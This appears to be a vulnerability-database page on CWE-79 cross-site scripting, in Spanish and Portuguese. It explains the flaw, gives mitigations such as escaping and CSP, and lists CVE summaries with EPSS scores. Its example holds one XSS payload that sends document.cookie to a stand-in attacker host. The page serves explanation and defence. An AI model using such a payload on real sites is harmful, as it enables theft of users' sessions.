Fallos del tipo CWE-79

28.628 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2021-23038—On version 16.0.x before 16.0.1.2, 15.1.x before 15.1.3.1, 14.1.x before 14.1.4.2, 13.1.x before 13.1.4.1, and all versions of 12.1.x, a stoEPSS 0.9%CVE-2020-8120—A reflected Cross-Site Scripting vulnerability in Nextcloud Server 16.0.1 was discovered in the svg generation.EPSS 0.9%CVE-2021-39328MEDIUMSimple Job Board <= 2.9.4 Authenticated Stored Cross-Site ScriptingEPSS 0.9%CVE-2021-39357MEDIUMLeaky Paywall <= 4.16.5 Authenticated Stored Cross-Site ScriptingEPSS 0.9%CVE-2026-51133MEDIUMCross Site Scripting vulnerability in za-internet GmbH C-MOR Video Surveillance <= V6.0104 allows a remote attacker to execute arbitrary codEPSS 0.9%CVE-2022-0719HIGHCross-site Scripting (XSS) - Reflected in microweber/microweberEPSS 0.9%CVE-2015-20019—Content text slider on post < 6.9 - Authenticated Stored Cross-Site Scripting (XSS)EPSS 0.9%CVE-2021-41086HIGHClipboard-based XSS in jsuitesEPSS 0.9%CVE-2022-44948MEDIUMRukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Entities Group feature at/index.php?moEPSS 0.9%CVE-2022-27878MEDIUMOn all versions of 16.1.x, 15.1.x, 14.1.x, 13.1.x, 12.1.x, and 11.6.x of F5 BIG-IP, and F5 BIG-IP Guided Configuration (GC) all versions priEPSS 0.9%CVE-2018-18997—Pluto Safety PLC Gateway Ethernet devices in ABB GATE-E1 and GATE-E2 all versions allows an unauthenticated attacker using the administrativEPSS 0.9%CVE-2017-20008—myCRED < 1.7.8 - Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-43861HIGHIncorrect sanitisation function leads to `XSS`EPSS 0.9%CVE-2007-1679MEDIUMMultiple cross-site scripting (XSS) vulnerabilities in Horde Groupware Webmail 1.0 allow remote authenticated users to inject arbitrary web EPSS 0.9%CVE-2018-0367—A vulnerability in the web-based management interface of the Cisco Registered Envelope Service could allow an authenticated, remote attackerEPSS 0.9%CVE-2022-26105—SAP NetWeaver Enterprise Portal - versions 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, is susceptible to script execution attack by an unautheEPSS 0.9%CVE-2020-27832—A flaw was found in Red Hat Quay, where it has a persistent Cross-site Scripting (XSS) vulnerability when displaying a repository's notificaEPSS 0.9%CVE-2018-15634HIGHCross-site scripting (XSS) issue in attachment management in Odoo Community 14.0 and earlier and Odoo Enterprise 14.0 and earlier, allows reEPSS 0.9%CVE-2024-11587MEDIUMidcCMS classProvCity.php GetCityOptionJs cross site scriptingEPSS 0.9%CVE-2019-1719MEDIUMCisco Identity Services Engine Cross-Site Scripting VulnerabilityEPSS 0.9%